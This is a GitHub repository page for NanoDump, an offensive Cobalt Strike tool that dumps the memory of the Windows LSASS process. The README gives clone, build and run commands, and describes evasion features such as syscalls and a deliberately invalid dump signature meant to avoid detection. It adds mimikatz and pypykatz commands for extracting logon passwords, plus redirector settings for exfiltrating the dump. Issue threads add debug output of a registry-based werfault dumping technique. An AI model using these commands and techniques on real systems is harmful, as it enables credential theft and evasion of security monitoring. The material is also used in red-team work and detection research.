A Beacon Object File that creates a minidump of the LSASS process.

Overview

NanoDump

A Beacon Object File that creates a minidump of the LSASS process.

screenshot

Features

  • It uses syscalls (with SysWhispers2) for most operations
  • You can choose to download the dump without touching disk or write it to a file
  • The minidump by default has an invalid signature to avoid detection
  • It reduces the size of the dump by ignoring irrelevant DLLs. The (nano)dump tends to be arround 10 MB in size
  • You don't need to provide the PID of LSASS
  • No calls to dbghelp or any other library are made, all the dump logic is implemented in nanodump
  • You can use the .exe version to run nanodump outside of Cobalt Strike 😄

Usage

Clone

git clone https://github.com/helpsystems/nanodump.git

Compile (optional)

cd nanodump
make

Import

Import the NanoDump.cna script on Cobalt Strike.

Run

Run the nanodump command.

beacon> nanodump

Restore the signature

Once you downloaded the minidump, restore the invalid signature

bash restore_signature.sh <dumpfile>

get the secretz

mimikatz

To get the secrets simply run:

mimikatz # sekurlsa::minidump 
   
    
mimikatz # sekurlsa::logonPasswords full

   

pypykatz

If you prefer to stay on linux, you can use the python3 port of mimikatz called pypykatz.

python3 -m pypykatz lsa minidump <dumpfie>

Parameters

--pid -p < PID > (optional)

PID of lsass. If not entered, nanodump will find it dinamically.

--write -w < path > (optional)

Where to write the dumpfile. If this parameter is not provided, the dump will be downloaded in a fileless manner.

--valid -v (optional)

If entered, the minidump will have a valid signature.
If not entered, before analyzing the dump restore the signature of the dump, with: bash restore_signature.sh

HTTPS redirectors

If you are using an HTTPS redirector (as you should), you might run into issues due to the size of the requests that leak the dump.
Increase the max size of requests on your web server to allow nanodump to download the dump.

NGINX

location ~ ^...$ {
    ...
    client_max_body_size 50M;
}

Apache2

LimitRequestBody 52428800 ">

   
    
    LimitRequestBody  52428800

   

Credits

Comments
  • LSASS process not found

    LSASS process not found

    I'm using the same exe on the same cloned VM, first one works, second one has an EDR and I get this:

    >whoami /all
    ...
    SeDebugPrivilege                Debug programs                            Disabled
    
    >tasklist
    ...
    lsass.exe                      728 Services                   0     16,536 K
    
    >nanodump.x64.exe -w dump
    The LSASS process was not found. Are you elevated?
    

    I'm guessing the EDR is doing something, but it has detected nothing, any idea?

    p.s. the VM is obviously isolated from internet/cloud

    opened by nemesis7331 9
  • Werfault technique returns empty lsass dump

    Werfault technique returns empty lsass dump

    Hi @S4ntiagoP ,

    the werfault technique seems cool and has some potential :)

    However, i run it on a Windows 1909 and i got an empty lsass dump:

    image

    This is the output of the debug release:

    C:\Users\splintercode\Desktop\nanodump-main\dist>nanodump.x64.exe --werfault C:\dmp -p 792
    DEBUG: source/utils.c:323:remove_syscall_callback_hook(): The syscall callback hook was set to NULL
    DEBUG: source/entry.c:474:main(): Using 792 as the PID of LSASS
    DEBUG: source/werfault.c:117:set_registry_keys(): Registry key has been created : \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
    DEBUG: source/werfault.c:137:set_registry_keys(): Registry key value has been created : GlobalFlag
    DEBUG: source/werfault.c:170:set_registry_keys(): Registry key has been created : \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\
    DEBUG: source/werfault.c:192:set_registry_keys(): Registry key has been created : \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe
    DEBUG: source/werfault.c:229:set_registry_keys(): Sub key LocalDumpFolder has been created
    DEBUG: source/werfault.c:246:set_registry_keys(): Sub key DumpType has been created
    DEBUG: source/werfault.c:500:rtl_report_silent_process_exit(): LSASS PID: 792, PID: 4508, TID: 10148
    DEBUG: source/werfault.c:352:WaitForWerSvc(): The WER is ready
    DEBUG: source/werfault.c:455:SendMessageToWERService(): Port handle: 0x000000000000008C
    DEBUG: source/werfault.c:472:SendMessageToWERService(): Sent the message to the WER service
    Done, to get the secretz run:
    python3 -m pypykatz lsa minidump lsass.exe-(PID-792).dmp
    

    Any idea why it's not working?

    opened by antonioCoco 6
  • Dumped file but file will not be parsed

    Dumped file but file will not be parsed

    INFO:root:Parsing file ../../TEST_1636586596_lsass.dmp INFO:pypykatz:===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE ===== INFO:pypykatz:pypyKatz version: 0.3.7 INFO:pypykatz:CPU arch: X64 INFO:pypykatz:OS: Windows 10 INFO:pypykatz:BuildNumber: 22000 INFO:pypykatz:MajorVersion: 6 INFO:pypykatz:MSV timestamp: 0 INFO:pypykatz:===== BASIC INFO END ===== ERROR:root:Error while parsing file ../../TEST_1636586596_lsass.dmp Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/cmdhelper.py", line 195, in run mimi = pypykatz.parse_minidump_file(args.memoryfile) File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 77, in parse_minidump_file raise e File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 73, in parse_minidump_file mimi.start() File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 267, in start self.get_logoncreds() File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 168, in get_logoncreds logoncred_decryptor.start() File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/packages/msv/decryptor.py", line 360, in start entry_ptr_value, entry_ptr_loc = self.find_first_entry() File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/packages/msv/decryptor.py", line 263, in find_first_entry position = self.find_signature('lsasrv.dll',self.decryptor_template.signature) File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/package_commons.py", line 71, in find_signature raise Exception('Signature was not found in module %s Signature: %s' % (module_name, self.decryptor_template.signature.hex())) Exception: Signature was not found in module lsasrv.dll Signature: 33ff4189374c8bf34585c074 Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/cmdhelper.py", line 195, in run mimi = pypykatz.parse_minidump_file(args.memoryfile) File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 77, in parse_minidump_file raise e File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 73, in parse_minidump_file mimi.start() File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 267, in start self.get_logoncreds() File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 168, in get_logoncreds logoncred_decryptor.start() File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/packages/msv/decryptor.py", line 360, in start entry_ptr_value, entry_ptr_loc = self.find_first_entry() File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/packages/msv/decryptor.py", line 263, in find_first_entry position = self.find_signature('lsasrv.dll',self.decryptor_template.signature) File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/package_commons.py", line 71, in find_signature raise Exception('Signature was not found in module %s Signature: %s' % (module_name, self.decryptor_template.signature.hex())) Exception: Signature was not found in module lsasrv.dll Signature: 33ff4189374c8bf34585c074

    It was dumped fine but it could not be parsed either from mimikatz or pypykatz.

    opened by trickster0 5
  • No error handling with append() for large dumps, corrupted data returned

    No error handling with append() for large dumps, corrupted data returned

    Hey, really appreciate the project.

    On systems where there's large memory dumps (>DUMP_MAX_SIZE), you get the "dump is too big" errors produced by append() as expected (line ~30 in nanodump.c). However, it doesn't set any state to indicate an error has occurred.

    This means you could end up with a load of the dump size errors, and then when it's time to send the data back, it still does (resulting in a lot data being exfiltrated), but it's obviously corrupted as it's not all there so you can't analyse it.

    opened by williamknows 4
  • Make issue Makefile.mingw source/malseclogon.c

    Make issue Makefile.mingw source/malseclogon.c

    nanodump$ make -f Makefile.mingw
    rm -f dist/*
    ###### RELEASE ######
    x86_64-w64-mingw32-gcc source/spoof_callstack.c source/dinvoke.c source/utils.c source/handle.c source/impersonate.c source/modules.c source/syscalls.c source/token_priv.c source/malseclogon.c source/nanodump.c source/werfault.c source/entry.c -o dist/nanodump.x64.exe -masm=intel -Wall -I include -DNANO -DEXE
    source/malseclogon.c: In function ‘leak_lsass_handle_in_seclogon_with_race_condition’:
    source/malseclogon.c:502:5: error: unknown type name ‘REQUEST_OPLOCK_INPUT_BUFFER’
      502 |     REQUEST_OPLOCK_INPUT_BUFFER inputBuffer = { 0 };
          |     ^~~~~~~~~~~~~~~~~~~~~~~~~~~
    source/malseclogon.c:503:5: error: unknown type name ‘REQUEST_OPLOCK_OUTPUT_BUFFER’
      503 |     REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer = { 0 };
          |     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~
    source/malseclogon.c:504:16: error: request for member ‘StructureVersion’ in something not a structure or union
      504 |     inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
          |                ^
    source/malseclogon.c:504:36: error: ‘REQUEST_OPLOCK_CURRENT_VERSION’ undeclared (first use in this function)
      504 |     inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
          |                                    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    source/malseclogon.c:504:36: note: each undeclared identifier is reported only once for each function it appears in
    source/malseclogon.c:505:16: error: request for member ‘StructureLength’ in something not a structure or union
      505 |     inputBuffer.StructureLength = sizeof(inputBuffer);
          |                ^
    source/malseclogon.c:506:16: error: request for member ‘RequestedOplockLevel’ in something not a structure or union
      506 |     inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
          |                ^
    source/malseclogon.c:506:40: error: ‘OPLOCK_LEVEL_CACHE_READ’ undeclared (first use in this function)
      506 |     inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
          |                                        ^~~~~~~~~~~~~~~~~~~~~~~
    source/malseclogon.c:506:66: error: ‘OPLOCK_LEVEL_CACHE_HANDLE’ undeclared (first use in this function)
      506 |     inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
          |                                                                  ^~~~~~~~~~~~~~~~~~~~~~~~~
    source/malseclogon.c:507:16: error: request for member ‘Flags’ in something not a structure or union
      507 |     inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
          |                ^
    source/malseclogon.c:507:25: error: ‘REQUEST_OPLOCK_INPUT_FLAG_REQUEST’ undeclared (first use in this function)
      507 |     inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
          |                         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    source/malseclogon.c:508:17: error: request for member ‘StructureVersion’ in something not a structure or union
      508 |     outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
          |                 ^
    source/malseclogon.c:509:17: error: request for member ‘StructureLength’ in something not a structure or union
      509 |     outputBuffer.StructureLength = sizeof(outputBuffer);
          |                 ^
    source/malseclogon.c:565:9: error: ‘FSCTL_REQUEST_OPLOCK’ undeclared (first use in this function); did you mean ‘FSCTL_REQUEST_BATCH_OPLOCK’?
      565 |         FSCTL_REQUEST_OPLOCK,
          |         ^~~~~~~~~~~~~~~~~~~~
          |         FSCTL_REQUEST_BATCH_OPLOCK
    make: *** [Makefile.mingw:11: nanodump] Error 1
    

    Text above displayed when fresh download of project is done with make -f Makefile.mingw command is run.

    opened by ceramic-skate0 3
  • Nanodump does not run on Server 2012 R2

    Nanodump does not run on Server 2012 R2

    Hello team,

    I have problems when I run the nanodump.x64.exe directly on a Windows Server 2012 R2 (in a powershell). Unfortunately there is no output or any error message at all. In general it looks like this:

    PS C:\users\public> .\n64.exe --write test1.docx
    PS C:\users\public>
    
    PS C:\users\public> .\n64.exe --write test2.docx --fork
    PS C:\users\public>
    
    PS C:\users\public> .\n64.exe --write test3.docx --snapshot
    PS C:\users\public>
    

    Nothing is done or written to the hard disk. Tested the same behavior on multiple Windows Server 2012 R2 with the same result. Have you ever noticed such behavior?

    Example system version:

    OS Name:                   Microsoft Windows Server 2012 R2 Standard
    OS Version:                6.3.9600 N/A Build 9600
    

    Thanks in advance for the support and also for the really cool tool :)

    opened by uidzeroo 3
  • source/utils.c(264): error C2065: 'ProcessInstrumentationCallback': undeclared identifier

    source/utils.c(264): error C2065: 'ProcessInstrumentationCallback': undeclared identifier

    hello, getting this error during the compile steps:

    C:\temp\nanodump>nmake -f Makefile.msvc

    Microsoft (R) Program Maintenance Utility Version 14.29.30140.0 Copyright (C) Microsoft Corporation. All rights reserved.

    RELEASE
        ML64 /c source/syscalls-asm.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64
    

    Microsoft (R) Macro Assembler (x64) Version 14.29.30140.0 Copyright (C) Microsoft Corporation. All rights reserved.

    Assembling: source/syscalls-asm.asm cl.exe -DNANO -DEXE -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include source/dinvoke.c source/utils.c source/handle.c source/modules.c source/syscalls.c source/token_priv.c source/malseclogon.c source/nanodump.c source/entry.c dinvoke.c utils.c source/utils.c(264): error C2065: 'ProcessInstrumentationCallback': undeclared identifier handle.c modules.c syscalls.c token_priv.c malseclogon.c nanodump.c entry.c Generating Code... NMAKE : fatal error U1077: '"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\HostX64\x64\cl.exe"' : return code '0x2' Stop.

    any ideas or i do something wrong ? thanks

    opened by johnjohnsp1 3
  • Get LSASS PID fails

    Get LSASS PID fails

    Hi,

    I was trying out on multiple systems now, with an elevated prompt and/or a SYSTEM shell. The find_lsass function always returns The LSASS process was not found. Try providing the PID with -p or --pid

    Dumping with manually specifying the ID works fine for me.

    I wonder what the problem is here, actually.

    Some ideas?

    Greetings

    opened by S3cur3Th1sSh1t 3
  • WIN7 Failed

    WIN7 Failed

    Target iInformation

    Windows 7 Ultimate (x64)

    I use the .exe version to run nanodump

    image

    then I downloaded the minidump and Recover invalid signatures

    image

    I use Kali pypykatz, But it failed

    image

    I also try to use Cobalt Strike, then use Kali pypykatz, it failed too

    Declare in advance that my Kali pypykatz is OK

    opened by TryA9ain 3
  • Maybe issue with nanodump -write

    Maybe issue with nanodump -write

    REF issue on other repo https://github.com/skelsec/pypykatz/issues/101

    I have run into this when using tool.

    Let me know what/if any feedback is needed.

    restore_signature.sh was run without error on file.

    1 Beacon did basically DOS shell with The dump file is too big. please increase DUMP_MAX_SIZE. this occurred on 1 of 2 tests.

    opened by ceramic-skate0 2
  • Unresolved external in nanodump.x64.o

    Unresolved external in nanodump.x64.o

    nanodump.x64.o cannot be used with "friendly" COFF loaders (like Cobalt Strike) due to implementations for get_library_address and get_function_address not being provided. A quick fix for this is provided below, although it imports a decent chunk of code that is unused and is not an ideal solution.

    tl;dr - as these functions are built without an implementation, the compiler treats them as external functions. When a COFF loader sees this, it will attempt to resolve an implementation externally, which it can't.

    diff --git a/source/entry.c b/source/entry.c
    index 323c2af..e37d62e 100644
    --- a/source/entry.c
    +++ b/source/entry.c
    @@ -1,6 +1,8 @@
     #include "entry.h"
    
     #ifdef BOF
    + #include "syscalls.h"
    + #include "dinvoke.c"
      #include "nanodump.c"
     #else
      #include "nanodump.h"
    
    opened by kulinacs 2
Owner
HelpSystems
Software, Services, and Support That Make Your Life Easier.
HelpSystems
Cobalt Strike Beacon Object File (BOF) that takes the name of of a PE file as an argument and spawns the process in a suspended state

Beacon Object File (BOF) that spawns an arbitrary process from beacons memory. Supports Parent Process ID (PPID) spoofing & blocking non-MS signed DLLs from loading into the processes memory (some EDR DLLs).

boku 349 Dec 1, 2022
anthemtotheego 402 Dec 26, 2022
Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.

Cobalt Strike "Where Am I?" Beacon Object File Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environmen

Bobby Cooke 92 Nov 30, 2022
Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR

Detect-Hooks Detect-Hooks is a proof of concept Beacon Object File (BOF) that attempts to detect userland API hooks in place by AV/EDR. The BOF will r

anthemtotheego 121 Dec 25, 2022
Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving

Beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving "cmd.exe" by using DCOM object.

Chris Au 91 Dec 28, 2022
This repository is meant to host the core files needed to create a Beacon Object File for use with Cobalt Strike

BOF Template This repository is meant to host the core files needed to create a Beacon Object File for use with Cobalt Strike. A Beacon Object File (B

Cobalt Strike 42 Nov 9, 2022
Beacon Object File allowing creation of Beacons in different sessions.

JumpSession_BOF This is a Beacon Object File allowing creation of Beacons in different sessions. Must be Elevated. This BOF was created on the heels o

null 70 Dec 7, 2022
C++ POC to write addintional credentials into LSASS process

LSASS_Injection_CreateProcessWithLogonW C++ POC to write addintional credentials into LSASS process Usage: LSASS_Injection_CreateProcessWithLogonW USE

null 3 Feb 9, 2022
Process Ghosting - a PE injection technique, similar to Process Doppelgänging, but using a delete-pending file instead of a transacted file

Process Ghosting This is my implementation of the technique presented by Gabriel Landau: https://www.elastic.co/blog/process-ghosting-a-new-executable

hasherezade 514 Jan 3, 2023
Capture Minidump of .NET Applications

This repository bundles sentry-native with Google's crashpad and distribute via NuGet with a .NET API to initialize. It allows capturing minidumps of .NET applications caused by native libraries or the .NET runtime itself.

Sentry 21 Dec 3, 2022
Collection of Beacon Object Files

Beacon Object Files Name Syntax ETW Patching etw stop / etw start API Function Utility read_function / check_function / patch_function <dll_path> <fun

null 418 Dec 27, 2022
A BOF for enumerating version information for DLLs associated for a Beacon process.

DLL Image Resource Version Enumeration BOF What is this? This is a Cobalt Strike BOF file (a mildly massaged port of @N4k3dTurtl3's existing PoC , mea

null 10 Nov 5, 2022
Kernel file/process/object tool

kt Kernel file/process/object tool killav bypass av dump lsass basic vs2019 + cpp + wdk usage(64-bit only) kdu -map sys.sys kt -F -d c:\windows\notepa

null 62 Nov 30, 2022
A Simple LSASS Credential Injection Tool

CredInject Hello Dear Reader! Welcome to the CredInject repo -- This project is based on HoneyCred and uses the same method to inject credentials into

null 7 Jun 8, 2022
PIC lsass dumper using cloned handles

HandleKatz This tool was implemented as part of our Brucon2021 conference talk and demonstrates the usage of cloned handles to Lsass in order to creat

CODE WHITE GmbH 485 Dec 28, 2022
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections and LSASS protections

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

Wavestone - Cybersecurity & Digital Trust 846 Jan 2, 2023
Tsdf-plusplus - TSDF++: A Multi-Object Formulation for Dynamic Object Tracking and Reconstruction

TSDF++: A Multi-Object Formulation for Dynamic Object Tracking and Reconstruction TSDF++ is a novel multi-object TSDF formulation that can encode mult

ETHZ ASL 130 Dec 29, 2022
Blazingly fast multi-object tracker. Works on 1 (x, y) point per object.

Norfair++ This is a C++ implementation of Techainer's Norfair, which originates from Norfair, a library for real-time 2D object tracking. Its function

Tô Đức (Watson) 6 Jan 26, 2022
Memory Process File System (MemProcFS) is an easy and convenient way of viewing physical memory as files in a virtual file system

The Memory Process File System (MemProcFS) is an easy and convenient way of viewing physical memory as files in a virtual file system.

Ulf Frisk 1.7k Jan 2, 2023